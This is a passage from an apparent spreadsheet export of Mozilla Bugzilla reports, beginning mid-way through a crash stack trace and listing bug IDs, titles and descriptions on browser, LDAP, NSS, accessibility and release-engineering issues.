js_Invoke(JSContext * 0x02b26e90 unsigned int 0x00000002 unsigned int
0x00000000) line 681 + 13 bytes
js_Interpret(JSContext * 0x02b26e90 long * 0x0012ec04) line 2226 + 15 bytes
js_Invoke(JSContext * 0x02b26e90 unsigned int 0x00000001 unsigned int
0x00000002) line 681 + 13 bytes
js_InternalCall(JSContext * 0x02b26e90 JSObject * 0x01ff8780 long 0x00da2940
unsigned int 0x00000001 long * 0x0012ed78 long * 0x0012ed34) line 758 + 15
bytes
JS_CallFunctionValue(JSContext * 0x02b26e90 JSObject * 0x01ff8780 long
0x00da2940 unsigned int 0x00000001 long * 0x0012ed78 long * 0x0012ed34) line
2758 + 29 bytes
nsJSContext::CallEventHandler(nsJSContext * const 0x02b201a0 void *
0x01ff8780 void * 0x00da2940 unsigned int 0x00000001 void * 0x0012ed78 int
* 0x0012ed74) line 564 + 33 bytes
nsJSDOMEventListener::HandleEvent(nsIDOMEvent * 0x02c13944) line 94 + 47 bytes
nsEventListenerManager::HandleEventSubType(nsListenerStruct * 0x02c43a80
nsIDOMEvent * 0x02c13944 unsigned int 0x00000001) line 640 + 19 bytes
nsEventListenerManager::HandleEvent(nsIPresContext * 0x02b204a0 nsEvent *
0x0012f574 nsIDOMEvent * * 0x0012f0d8 unsigned int 0x00000007 nsEventStatus
* 0x0012f5b4) line 1191 + 31 bytes
GlobalWindowImpl::HandleDOMEvent(GlobalWindowImpl * const 0x02b20204
nsIPresContext * 0x02b204a0 nsEvent * 0x0012f574 nsIDOMEvent * * 0x0012f0d8
unsigned int 0x00000001 nsEventStatus * 0x0012f5b4) line 3251
nsWebShell::OnEndDocumentLoad(nsWebShell * const 0x02b25590 nsIDocumentLoader
* 0x02b22c70 nsIChannel * 0x02b27cb0 unsigned int 0x804b0002) line 3089 + 34
bytes
nsDocLoaderImpl::FireOnEndDocumentLoad(nsDocLoaderImpl * 0x02b22c70 nsIChannel
* 0x02b27cb0 unsigned int 0x804b0002) line 822
nsDocLoaderImpl::DocLoaderIsEmpty(unsigned int 0x804b0002) line 713
nsDocLoaderImpl::OnStopRequest(nsDocLoaderImpl * const 0x02b22c74 nsIChannel *
0x02b27cb0 nsISupports * 0x00000000 unsigned int 0x804b0002 const unsigned
short * 0x00000000) line 657
nsLoadGroup::RemoveChannel(nsLoadGroup * const 0x02b22b60 nsIChannel *
0x02b27cb0 nsISupports * 0x00000000 unsigned int 0x804b0002 const unsigned
short * 0x00000000) line 535 + 42 bytes
nsLoadGroup::Cancel(nsLoadGroup * const 0x02b22b60) line 218
nsDocLoaderImpl::Stop(nsDocLoaderImpl * const 0x02b22c70) line 420 + 26 bytes
nsWebShell::Stop(nsWebShell * const 0x02b25580) line 2202
nsWebShell::Destroy(nsWebShell * const 0x02b254dc) line 3745
nsWebShellWindow::Close(nsWebShellWindow * const 0x02b22a10) line 440
nsWebShellWindow::HandleEvent(nsGUIEvent * 0x0012f8d8) line 505
nsWindow::DispatchEvent(nsWindow * const 0x02b24b14 nsGUIEvent * 0x0012f8d8
nsEventStatus &amp; nsEventStatus_eIgnore) line 502 + 10 bytes
nsWindow::DispatchWindowEvent(nsGUIEvent * 0x0012f8d8) line 523
nsWindow::DispatchStandardEvent(unsigned int 0x00000065) line 543 + 15 bytes
nsWindow::ProcessMessage(unsigned int 0x00000010 unsigned int 0x00000000 long
0x00000000 long * 0x0012faf4) line 2597
nsWindow::WindowProc(HWND__ * 0x033e06b2 unsigned int 0x00000010 unsigned int
0x00000000 long 0x00000000) line 689 + 27 bytes
USER32! 77e719d0()
USER32! 77e71982()
NTDLL! 77f763a3()
USER32! 77e718d2()
nsWindow::DefaultWindowProc(HWND__ * 0x033e06b2 unsigned int 0x00000112
unsigned int 0x0000f060 long 0x005c042c) line 716
USER32! 77e727fe()
USER32! 77e72889()
nsWindow::WindowProc(HWND__ * 0x033e06b2 unsigned int 0x00000112 unsigned int
0x0000f060 long 0x005c042c) line 696 + 31 bytes
USER32! 77e719d0()
USER32! 77e71982()
NTDLL! 77f763a3()
USER32! 77e718d2()
nsWindow::DefaultWindowProc(HWND__ * 0x033e06b2 unsigned int 0x000000a1
unsigned int 0x00000014 long 0x005c042c) line 716
USER32! 77e727fe()
USER32! 77e72889()
nsWindow::WindowProc(HWND__ * 0x033e06b2 unsigned int 0x000000a1 unsigned int
0x00000014 long 0x005c042c) line 696 + 31 bytes
USER32! 77e71820()
            rv = listener-&gt;CanHandleContent(aContentType aCommand
aWindowTarget
                                            aContentTypeToUse
I think listener is bad. It's vtable ptr is 0x80000001. Must be a bad
assumption about its lifetime w.r.t. window destruction.</t>
  </si>
  <si>
    <t>CORE-258006</t>
  </si>
  <si>
    <t>Mouse-wheel scroll events does not propagate to viewport from fixed pos. elements</t>
  </si>
  <si>
    <t>Mouse-wheel scroll events does not propagate to viewport from fixed pos.
elements.  (This is spawned off from bug 256538).
The reason is that the fixed pos. frame hangs of the Fixed-list of the
Viewport frame which means traversing the frame ancestor chain in
nsEventStateManager::DoScrollText misses the ScrollPortFrame(html).
STEPS TO REPRODUCE:
1. Load testcase
2. position mouse over the green area
3. mouse-wheel scroll
ACTUAL RESULTS:
Nothing happens.
EXPECTED RESULTS:
Scrolling occurs.</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-426462</t>
  </si>
  <si>
    <t>Major rewrite of abstract syntax trees</t>
  </si>
  <si>
    <t>Created attachment 313016
Big patch
This patch converts the ASTs to be based mainly on classes and interfaces (plus arrays and primitive data).
The new classes are self-serializing and deserializing with the help of a little glue code so ast-encode.es and ast-decode.es disappear completely.
AST tag types that were defined as classes and recognized by 'switch type' in the code generator have been recast as numeric values (aids serialization probably aids performance eventually).</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-506780</t>
  </si>
  <si>
    <t>create throttled MU for FF3.0.13-&gt;FF3.5.2</t>
  </si>
  <si>
    <t>Once FF3.0.13 is released existing FF3.0.x users will no longer be able to see
the FF3.0.12-&gt;FF3.5.1 MU offer.
This bug is to track producing new FF3.0.13-&gt;FF3.5.2 MU offer *before* we ship
FF3.0.13.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-473140</t>
  </si>
  <si>
    <t xml:space="preserve">CVS Account Request - Teemu Mannermaa </t>
  </si>
  <si>
    <t>Created attachment 356487
My public key
I would like CVS write access for Bugzilla and bugzilla.org website.
CCing potential vouchers. There are no super-reviewers for the Webtools stuff.
Committer's Agreement v2.0 via fax is on it's way and my public key for this access is attached.</t>
  </si>
  <si>
    <t>FIREFOX-395140</t>
  </si>
  <si>
    <t>leave preferred app when setting action to something else in Applications prefpane</t>
  </si>
  <si>
    <t>When a user sets an action to something other than use helper app in the new Applications prefpane the prefpane removes the preferred app from the datastore.  Perhaps we should keep it around since legacy datastores don't include the preferred app in the list of possible apps and that means removing the preferred app from the datastore will remove it from the list of possible actions.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-484456</t>
  </si>
  <si>
    <t>Gloda.getMessageContent regressed by fix for bug 482416</t>
  </si>
  <si>
    <t>Created attachment 368582
v1 fix getMessageContent unit test
Bug 482416 simplified the MimeMessage representation produced by the JS Mime Emitter.  Unfortunately getMessageContent broke because it used something that was simplified away.  getMessageContent had no test coverage primarily because it was added exclusively for exptoolbar and had no in-tree consumers.
The attached patch resolves the getMessageContent regression and introduces a new unit test to ensure it doesn't happen again.  Also the unit test gives fundattr's quoting detection logic and GlodaContent somewhat of a workout.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-508364</t>
  </si>
  <si>
    <t>Site page</t>
  </si>
  <si>
    <t>make changes to the site detail page per the spec.
http://people.mozilla.com/~chowse/drop/cesium/HiFid_Site.png
Remove:
* Page stats table
* Pass/fail images and text
* Load time</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-492294</t>
  </si>
  <si>
    <t>Connect networking for the 4 new MoMo blades</t>
  </si>
  <si>
    <t>The 4 new blades need network connectivity to the momo-core cisco switch.
The blade enclosure has 2 ethernet pass-thru modules and currently port 1 and 2
on each of these are connected to momo-core for the initial 2 blades.
For the new blades 8 new connections will be necessary.
Gi1/0/15-18
Gi2/0/15-18
on momo-core have been reserved for this usage.
So the connections would be:
port 3456 on blade ethernet pass-thru 1 to port Gi1/0/15161718 on momo-core
port 3456 on blade ethernet pass-thru 2 to port Gi2/0/15161718 on momo-core
Thanks and poke me if it's not clear or obvious enough when looking at the hardware.</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-385268</t>
  </si>
  <si>
    <t>Firefox Mac unit test tinderbox (qm-xserve01) is dead</t>
  </si>
  <si>
    <t>Not sure what's going on here but we need to get this box back up and running ASAP. sayrer suggested a reboot.</t>
  </si>
  <si>
    <t>NSS-286685</t>
  </si>
  <si>
    <t>Rename all softoken private functions and types from PK11 to SFTK</t>
  </si>
  <si>
    <t>cmd/bltest/blapitest.c
lib/pk11wrap/pk11pars.c
lib/softoken/dbinit.c
lib/softoken/dbmshim.c
Presently all the code having anything to do with PKCS11 has function
names and type names that begin with PK11_ or pk11_ whether inside
the PKCS11 softoken module (where all symbols not defined by the PKCS11 
spec should be private) or outside the softken (e.g. in pk11wrap).
This has been a great cause of confusion for developers who haven't
memorized this code.  When one is debugging one cannot tell by looking
at the source files or the names of the functions on the stacks or 
the names of the types whether one is looking at code below the 
PKCS11 line (inside a PKCS11 module) or above that line (outside the
module).
IMO the PK11_ functions should all be used for the pk11wrapper layer
exclusively.  The softoken module should use some (ANY) other prefix.
Therefore I propose to rename all functions in softoken to begin 
with SFTK_ or sftk_ and rename all types and defined symbols 
defined in NSS-private header files in lib/softoken to begin with 
SFTK instead of PK11.
I have already done this work.  I have changed all (or nearly all)
the NSS-private header files in softoken and all (or nearly) the .c 
files in softoken.  I did not change the PUBLIC header files in 
softoken that define the PKCS11 public API.  
The ONLY problems were due to the code in softoken/pk11pars.h (which 
is really a .c file!) which gets compiled and linked into both 
softoken and pk11wrap.  The source uses symbols from both softoken
and from pk11wrap.  Maybe the many functions defined in this file 
should have another prefix that is neither PK11 nor SFTK but rather
SMOD or SECM or SECMOD or secmod.  But what I did was to rename all
these functions from pk11_ to sftk_.  
Only 2 files outside of lib/softoken needed to be changed.  They were:
cmd/bltest/blapitest.c   (which calls softoken's fips selftest function)
lib/pk11wrap/pk11pars.c  (which calls the functions in pk11pars.h 
                          mentioned above.)
The files changed in lib/softoken were:
lib/softoken/softoken.h
lib/softoken/pkcs11i.h
lib/softoken/pk11pars.h
lib/softoken/fipstest.c
lib/softoken/fipstokn.c
lib/softoken/pcertdb.c
lib/softoken/pk11db.c
lib/softoken/pkcs11.c
lib/softoken/pkcs11c.c
lib/softoken/pkcs11u.c
lib/softoken/tlsprf.c
I will attach a zip file containing the diffs.  The diffs are HUGE which 
is why I'm zipping them up.  They were all made with a global search and
replace script (gsr) except for some of the ones in these files:
cmd/bltest/blapitest.c   changed one func from pk11_ to sftk_
lib/pk11wrap/pk11pars.c  changed numerous pk11pars.h funcs from pk11_ to sftk_
lib/softoken/pk11pars.h  after gsr had to change some symbols back to PK11_
lib/softoken/pk11db.c    ditto 
So I suggest the reviewers should focus on those 4 files and maybe the
header files.  If the headers are right and those 4 are right the rest
should also be right because of the use of the gsr tool.</t>
  </si>
  <si>
    <t>CORE-413325</t>
  </si>
  <si>
    <t>nsNativeRootAccessibleWrap doesn't release ref of AtkObject of dialogs</t>
  </si>
  <si>
    <t>When open a gnome native dialog in Firefox e.g. Open File.. dialog we creates a nsNativeRootAccessibleWrap object which holds a ref of the AtkObject.
But it doesn't release the ref in deconstruction.</t>
  </si>
  <si>
    <t>CORE-136958</t>
  </si>
  <si>
    <t>META HTTP-EQUIV=refresh stops working after a while</t>
  </si>
  <si>
    <t xml:space="preserve">The refresh stops working ervery 60 minutes after the browsert was started.
The following HTML-Code illustrates the problem:
var mow = new Date()
document.write('Status
('+mow.getHours()+':'+mow.getMinutes()+':'+mow.getSeconds()+'):')
</t>
  </si>
  <si>
    <t>ulrichsk</t>
  </si>
  <si>
    <t>BUGZILLA-318205</t>
  </si>
  <si>
    <t>the path to the hook is incorrect when called from inside a block</t>
  </si>
  <si>
    <t>If the template template/en/default/foo/bar/baz.html.tmpl contains a block like:
[% BLOCK bug_display %]
[% Hook.process(external) %]
[% END %]
The hook has to be located at template/en/extension/hook/bug_display/external/ instead of template/en/extension/hook/foo/bar/baz.html.tmpl/external/.
I spent 20 minutes to understand why my hook was ignored! :(</t>
  </si>
  <si>
    <t>elliotte_martin</t>
  </si>
  <si>
    <t>CORE-548193</t>
  </si>
  <si>
    <t>Content Security Policy XML reports have escaping bugs should probably use JSON anyway</t>
  </si>
  <si>
    <t>Jonas and I talked this over with sstamm today. The csp-report documents are produced using string concatenation leading to pretty much inevitable escaping bugs. We all agreed JSON is a better fit anyway. Use the built-in JSON.stringify method to get something correctly escaped.
site of bug:
http://mxr.mozilla.org/mozilla-central/source/content/base/src/contentSecurityPolicy.js#250</t>
  </si>
  <si>
    <t>DIRECTORY-174912</t>
  </si>
  <si>
    <t>Sporadically missing entries during referral.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 Q312461 .NET CLR 1.0.3705)
Build Identifier: Mozilla/5.0
The Mozilla SDK 5.0 client occasionally ignores requests when the LDAP server 
returns more than one referral.  With a little logging and tracing I find that 
some requests terminate parent requests before the parent completes receiving 
responses.  This results in lost entry results and even lost referrals.
In read1msg() of result.c a while-loop decreases the lr_outrefcnt of the 
parent associated with the finished referral below.  The loop finishes with lr 
pointing to the highest parent who has a positive lr_outrefcnt (after the 
subtraction) or simply the highest parent in the branch.  In either case 
read1msg() continues and frees everything at lr and below with 
nsldapi_free_request(lr) so the while-loop had better give us the highest 
completed lr or it will free outstanding requests.  Unfortunately my logs show 
that the while-loop can finish with an lr above requests who still have 
lr_res_msgtype==LDAP_RES_SEARCH_REFERENCE indicating that indeed the current 
code incorrectly frees outstanding requests.
Typically how does this happen?  Consider a system where referral generates 
requests looking like:
[r1]-&gt;[r2]-&gt;[r3]
Where arrows = children.
1.	 Assume [r3] just got a final response from the server setting its 
lr_res_msgtype to LDAP_RES_SEARCH_RESULT and read1msg() now enters the while-
loop.
2.	The loop goes up to [r2] to decrease its lr_outrefcnt to 0.
3.	What if [r2] isnâ€™t done?  What if it is about to receive an entry?  Or 
another URL referral?  What if [r2]â€™s lr_res_msgtype==LDAP_RES_SEARCH_REFERENCE 
right now?  - the while-loop ignores it!  The loop only sees [r2]â€™s 
lr_outrefcnt==0 and continues up to set lr=[r1].
4.	Assume [r1] already has lr_res_msgtype==LDAP_RES_SEARCH_REFERENCE â€“ 
remember responses from the server arrive any time so although [r2] is 
incomplete [r1] may have completed ages ago.  Since [r2] was [r1]â€™s only 
referral [r1]â€™s lr_outrefcnt is now 0.
5.	The while-loop canâ€™t go up further and lets lr rest at [r1].
6.	When we get to the â€œwe recognize a request as complete whenâ€ 
conditions we see that [r1] satisfies all conditions.  Satisfying these 
conditions we enter the resource freeing code.
7.	When nsldapi_free_request(lr) starts freeing resources from the [r1] 
branch [r2] disappears though itâ€™s not finished.
What can we do to stop this calamity?:
Placing an lr_res_msgtype check before traversing up to the parent can correct 
this.  All we have to do is stop at [r2] and [r2] will fail the conditions that 
are required to execute nsldapi_free_request(lr).  To stop at [r2] we 
immediately break the loop when lr_res_msgtype==LDAP_RES_SEARCH_REFERENCE in 
the while-loop right after merge_error_info() before lr=lr-&gt;lr_parent 
traverses up.  When we finally get a result response for [r2] weâ€™ll execute 
this loop again and this time lr-&gt;lr_res_msgtype should be 
LDAP_RES_SEARCH_RESULT which will let us continue and free [r2] properly.  Note 
that we subtract the parentâ€™s lr_outrefcnt at the end of the previous iteration 
of the same while-loop so its lr_outrefcnt is always current even with the new 
loop breaker.
The fix looks like:
	while ( lr-&gt;lr_parent != NULL ) {
		merge_error_info( ld lr-&gt;lr_parent lr )
		if( lr-&gt;lr_res_msgtype == LDAP_RES_SEARCH_REFERENCE ) // new
			break                                        // new
		lr = lr-&gt;lr_parent
		if ( --lr-&gt;lr_outrefcnt &gt; 0 )
			break
	}
Reproducible: Always
Steps to Reproduce:
1. Set up three server instances A B C.
2. Set up referrals A--&gt;B--&gt;C.
3. Execute any sub search from A that must refer to B then C.
4. Repeat step #3 until symptoms surface and an expected entry cannot be found.
Actual Results:  
After about an hour of looping 1 entry in the directory cannot be found.  
LDAP_SUCCESS returns as if no entries were expected.  Executing one more search 
for the same entry reveals it indeed should've have been found.  It seems the 
faster the computer the longer it takes for the symptoms to appear.
Expected Results:  
Returned the entry from the directory ... consistantly.
Test done with Netscape Directory Server 6.01 on an HP-UX 11.00 system with the 
September 2002 Quality Pack.</t>
  </si>
  <si>
    <t>Sherman.Wu</t>
  </si>
  <si>
    <t>CORE-448744</t>
  </si>
  <si>
    <t>IAccessibleText::caretOffset should return -1 if the system caret is not currently with in that particular object.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1a2pre) Gecko/2008072603 Minefield/3.1a2pre
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9.1a2pre) Gecko/2008072603 Minefield/3.1a2pre ID:2008072603
It has been agreed upon that the specification for IAccessibleText state that if the caret is not actually in a particular object then IAccessibleText::caretOffset return -1.
See http://www.linuxfoundation.org/en/Accessibility/IAccessible2/Minutes/20080729
For when it was talked about.
Currently it seems in Gecko if you ask for IAccessibleText::caretOffset and the caret is not with in that object then the offset returned seems to be the length of the text (IAccessibleText::nCharacters).
It is useful for ATs to be able to very quickly work out if the system caret is in a particular object by returning -1 if its not will provide this.
Specifically this will help improve NVDA's support for rich editable documents such as Thunderbird html message composition.
Note that as Gecko Accessibility hyerarchy provides a caretOffset for parents of the object with the caret because of embedded object characters etc this should still stay unchanged. The only place where -1 should be returned is where the system caret is not in this object or any of its descendants.
Perhaps returning -1 may also be a good idea for other accessibility APIs such as ATK though I guess this would need to be talked about with ATs who use that support to see if it would be at all useful.
Reproducible: Always
Steps to Reproduce:
1. reply to an existing message in Thunderbird making sure you are composing messages in HTML 
2. move the system caret so it is on the first character of the quoted text
3. Using Accessibility probe look at the object representing the quoted text and notice that the caret offset is 0.
4. move the system caret up out of the quoted text in to the start of the document the blalblalbla wrote: bit.
5. with Accessibility probe take another look at the object representing the quoted text and note what its caret offset is.
Actual Results:  
The caret offset when the system caret is not there is the offset past the last character in the quoted text (e.g. same as IAccessibleText::nCharacters).
Expected Results:  
caret offset should be -1.</t>
  </si>
  <si>
    <t>CORE-455279</t>
  </si>
  <si>
    <t>nsSVGMaskFrame behaves incorrectly when the incoming gfxContext has a non-identity transform</t>
  </si>
  <si>
    <t>Created attachment 338584
fix
Two bugs in nsSVGMaskFrame:
1) We should set 'clipExtents' before we do gfx-&gt;Restore() so that the clip we set to the maskArea is counted. Right now we're actually ignoring that area and in many cases clipExtents is the entire viewport. Slow!
2) It assumes that gfxContext has an identity transform. In particular we're taking 'surface' and copying it to 'image' ignoring the fact that there might be scaling in the gfxContext's matrix so surface's pixels have nothing to do with user-space pixels at all (and it's user-space pixels that 'image' needs to be in).
This patch takes a simple approach to fix 2). Instead of extracting 'surface' from the pattern just use the pattern directly! And set the device offset of 'image' right away so that it catches exactly the area we want.
I found bug #2 while playing with CSS transforms and SVG 'mask'.</t>
  </si>
  <si>
    <t>CALENDAR-267436</t>
  </si>
  <si>
    <t>Sunbird default mozconfig has redundant entry</t>
  </si>
  <si>
    <t>ac_add_options --disable-profilesharing is used twice.
See http://lxr.mozilla.org/seamonkey/source/calendar/sunbird/config/mozconfig#12
and http://lxr.mozilla.org/seamonkey/source/calendar/sunbird/config/mozconfig#18
I will provide a patch on the weekend if necessary. But if one of you guys can
fix this before I would appreciate it.</t>
  </si>
  <si>
    <t>SEAMONKEY-207407</t>
  </si>
  <si>
    <t>Enable building a linkable library of gecko components</t>
  </si>
  <si>
    <t>Some platforms (Mac) can get a major startup time boost from being able to
prebind libraries which requires having all of the symbols present at link
time.  I came up with an approach that allows us to do this by creating a
linkable library containing all (well whichever ones you build) of the gecko
components which can then be registered via the static component loader.  Your
application or embedding wrapper would link directly against this library.
I did some measurements on Mac OS X (10.2.6) and found that I got around 35%
startup time improvement using this approach with mozilla-bin.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-333353</t>
  </si>
  <si>
    <t>fast-update queries for all updates for mozilla/ (not fast)</t>
  </si>
  <si>
    <t>With the new fast-update code to handle local directories (-l) we now query bonsai for all updates to mozilla/.  For me (having not used fast-update for a while) this took a long time.  I gave up after 10 minutes.  It would be faster to
a) query bonsai once for all changes to mozilla/ at the start and the re-use the list as needed.
b) always update mozilla/ (with -l) and don't query bonsai about it.
I'll attach a patch that does (b).</t>
  </si>
  <si>
    <t>RHINO_GRAVEYARD-464898</t>
  </si>
  <si>
    <t>Rhino standard tests don't run cleanly</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.3) Gecko/2008092510 Ubuntu/8.04 (hardy) Firefox/3.0.3
Build Identifier: 
Running the tests with ant-junit all reports a lot of failed tests. Running tests as explained at https://developer.mozilla.org/en/Running_the_Rhino_tests doesn't report any failure (at least for interpreted mode).
This shows that there is a big problem at least in one of the two methods.
The first failing test reported when running the tests as junit tests is lc3/ArrayMethods/object-001.js. Which is not reported as failing by JsDriver.
If I add following as first statement of JsDriver.excluded:
            if (!path.contains(lc3/ArrayMethods/object-001.js))
            	return true
and run JsDriver tests again then only this single test is run... and if fails exactly like when running it as unit test.
For me this shows a really big problem in the tests. Particularly this seems to mean that we can't trust the results of JsDriver and that the unit test result are (more?) correct. In which case a lot of tests fail currently!
Additionally do we really need JsDriver? It is important to be able to build and run the tests in automatic build process and have usable results that we can trust. JUnit seems better suited for this purpose.
I set the severity of this issue as critical because I think that we can't have any reliable information on Rhino's quality as long as it is not fixed.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>AUS_GRAVEYARD-500567</t>
  </si>
  <si>
    <t>Throttle FF3.0.11-&gt;FF3.5rc3 major update before FF3.5 release day</t>
  </si>
  <si>
    <t>As part of FF3.5 release we're making major updates available to FF3.0.11 users who manually check for updates. However we need to make sure that *no* users are offered this MU as part of idle background checks.
This should be done for both beta *and* release users.</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID-898151</t>
  </si>
  <si>
    <t>Add-on Manager</t>
  </si>
  <si>
    <t>The new customise search engine page lacks an informational graphic.</t>
  </si>
  <si>
    <t>According to the graphics provided:
https://bug891115.bugzilla.mozilla.org/attachment.cgi?id=772318
There should be a nifty Tip graphic illustrating how to add new search providers present on the customise search providers page. There is not - let's fix that.</t>
  </si>
  <si>
    <t>chriskitching</t>
  </si>
  <si>
    <t>CORE-377884</t>
  </si>
  <si>
    <t>Switch nsXPConnect::Traverse to use tracing</t>
  </si>
  <si>
    <t>nsXPConnect::Traverse is still missing some JS edges using tracing would probably make it find those.</t>
  </si>
  <si>
    <t>BUGZILLA-105960</t>
  </si>
  <si>
    <t>xml.cgi and other future xml pages generate invalid XML</t>
  </si>
  <si>
    <t>Because xml.cgi basically hand crafts xml instead of using the standard perl XML
libraries it doesn't escape/encode umlauts (for example) so the XML it creates
is invalid. This means that sane XML libraries looking to parse the code are...
well displeased. 
Because we are moving towards templates for all data output (not just xml.cgi)
it seems unlikely that this problem is going to be solved the 'correct' way-
i.e. by using the perl XML libraries to create properly encoded XML.
So... I'm not entirely sure that there is any elegant solution to this except
maybe to provide a 'encode_this_like_XML_likes()' function that can be called
iff xml is chosen as the output format. Not sure how that would work though.
But it is a problem and will continue to be if people want to use standard
system libraries (on both linux and windows) to create interaction with bugzilla.</t>
  </si>
  <si>
    <t>khampton</t>
  </si>
  <si>
    <t>SEAMONKEY-514890</t>
  </si>
  <si>
    <t>Fix new Get messages and Get all new messages shortcut in help content</t>
  </si>
  <si>
    <t>Get new messages and Get all new messages shortcuts have been changed to [Ctrl]+[D] and [Shift]+[Ctrl]+[D] so shortcuts_mailnews.xhtml should be updated.</t>
  </si>
  <si>
    <t>TOOLKIT-345379</t>
  </si>
  <si>
    <t>Case-sensitivity in the find bar is broken</t>
  </si>
  <si>
    <t>The patch that was checked in for bug 342000 is retarded and should be backed out.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-200063</t>
  </si>
  <si>
    <t>GTK crash with gdkdrawable-x11.c</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (compatible Konqueror/3.1 Linux)
Build Identifier: CVS from Mozilla 3.30.2003 about 23:00 EST
On load mozilla dumps the attached output &amp; stack trace... 
Reproducible: Always
Steps to Reproduce:
1. Start mozilla 
2. 
3. 
Built from CVS... all dependencies were built of recent versions from source</t>
  </si>
  <si>
    <t>holtje</t>
  </si>
  <si>
    <t>CORE-478811</t>
  </si>
  <si>
    <t>[FIX]IsTableRelated check in GetAbsoluteContainingBlock is incorrect</t>
  </si>
  <si>
    <t>The IsTableRelated check in GetAbsoluteContainingBlock checks for table-related display types and skips frames that have them.  However when calling ProcessChildren the push or not of the parent as an absolute containing block depends on the code being used to construct the parent.  This means that we end up with different absolute containing blocks on the two codepaths.  Test that shows this coming up then a fix.</t>
  </si>
  <si>
    <t>TESTING-475778</t>
  </si>
  <si>
    <t>integrate fennec automation code into existing automation</t>
  </si>
  <si>
    <t>We have developed a lot of tools to make the unittests run on Fennec.  There are a lot of little tweaks necessary and many of them are useful for Firefox.
I have outlined our toolset (maemkit):
https://wiki.mozilla.org/Mobile/Fennec_Automation#Maemkit_Toolset
More specifically here are instructions for running the individual tests on Fennec:
Mochitest: http://wiki.mozilla.org/Mobile/Fennec_Mochitest
Chrome: http://wiki.mozilla.org/Mobile/Fennec_Chrome
Reftest: http://wiki.mozilla.org/Mobile/Fennec_Reftests
Bug 421611 is resolving a lot of the packaging issues which are required to get the tests onto the device.  
Some of the things which we have done to work smoother on Fennec:
 - run directories/manifests as a single chunk instead of everything at once
 - split up a directory/manifest to reduce the runtime of a given test chunk
 - run a subset of chunks on a given device to allow for parallel runs
 - read options from a config file
The goal of this bug is to identify which pieces we will integrate into the existing automation and what pieces will remain in an external tool which we can check in.</t>
  </si>
  <si>
    <t>WEBSITES-467902</t>
  </si>
  <si>
    <t>Localize the Firefox in your country (round 2) survey</t>
  </si>
  <si>
    <t>We are organizing a second round of the Firefox in your country survey which is scheduled for launch on December 12. The locales for this round include:
es-ES fr fy-NL it nl ro
We would like to ask you to translate the attached questions for this survey. 
The format of the file is:
English text
Translated text
Please use an UTF-8-enabled text editor and attach you translations to this bug. Ideally we would like to get them back by December 10 so that you have another 2 days to test the survey.
You'll see a couple of duplicated strings in the l10n file (e.g. Yes or Other). These are provided for context and be aware that only the last occurrences will be actually used so please translate them consistently. Don't hesitate to ask questions in this bug if you have any.
Thanks so much!</t>
  </si>
  <si>
    <t>BUGZILLA-195695</t>
  </si>
  <si>
    <t>Requesting a non-existant format results in an Internal Error</t>
  </si>
  <si>
    <t>This situation because it's most likely user error (requesting a format that
doesn't exist) should ThrowUserError.  It winds up doing ThrowTemplateError
because it blindly tries to run the template of that format even though it
doesn't exist.</t>
  </si>
  <si>
    <t>MOZILLA_LABS_GRAVEYARD-528297</t>
  </si>
  <si>
    <t>favorites data not loaded if accept third-party cookies unchecked</t>
  </si>
  <si>
    <t>Personas sometimes fails to load favorites data if accept third-party cookies is unchecked in Preferences &gt; Privacy.  We fixed this before in bug 510123 but it's broken again.
I think the cause is different this time.  It looks like the problem is that the server now redirects /gallery/All/Favorites?json=1 to a locale-specific subdirectory like /en-US/gallery/All/Favorites?json=1 and the forceAllowThirdPartyCookies flag we use to send cookies with the request is not observed across the redirect.
I have filed bug 528292 on the issue with forceAllowThirdPartyCookies not being observed across the redirect and bug 528295 on the issue with the server redirecting these requests in the first place.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-316456</t>
  </si>
  <si>
    <t>Request approval for three small spelling corrections - Basque language (eu)</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-468738</t>
  </si>
  <si>
    <t>set mode attribute on icons box rather than on main window</t>
  </si>
  <si>
    <t>It's only used to style the URL buttons so we can simplify the CSS by moving the attribute.</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-848531</t>
  </si>
  <si>
    <t>Remove UA override for stackoverflow.com</t>
  </si>
  <si>
    <t>http://meta.stackoverflow.com/a/170294/166787 indicates this is fixed now. Let's remove the UA override.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-500669</t>
  </si>
  <si>
    <t>indexing status &amp; activity manager: special case indexing one message</t>
  </si>
  <si>
    <t>gloda often ends up displaying messages in the status bar like indexing 0 of 1 message.  Also the activity manager shows very brief progress bars for these cases.
I propose:
1) the indexing N of M message starts with N=1
2) if M is 1 then we say something like indexing message from 
3) we don't create activity manager progress items for batches of 1.</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG_GRAVEYARD-523615</t>
  </si>
  <si>
    <t>[ka] Thunderbird 3 in-product pages localization</t>
  </si>
  <si>
    <t>CORE-205110</t>
  </si>
  <si>
    <t>Composer capitalizes  to  which gives validation error</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.4b) Gecko/20030507
Build Identifier: Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.4b) Gecko/20030507
Composer changes the copyright character from  to  
Reproducible: Always
Steps to Reproduce:
1. Open a new composer page
2. Switch to HTML Source view and enter  2003 in the body 
3. switch to Normal and back to HTML Source view it changed to  2003
4. save the file and validate it at http://validator.w3.org/file-upload.html
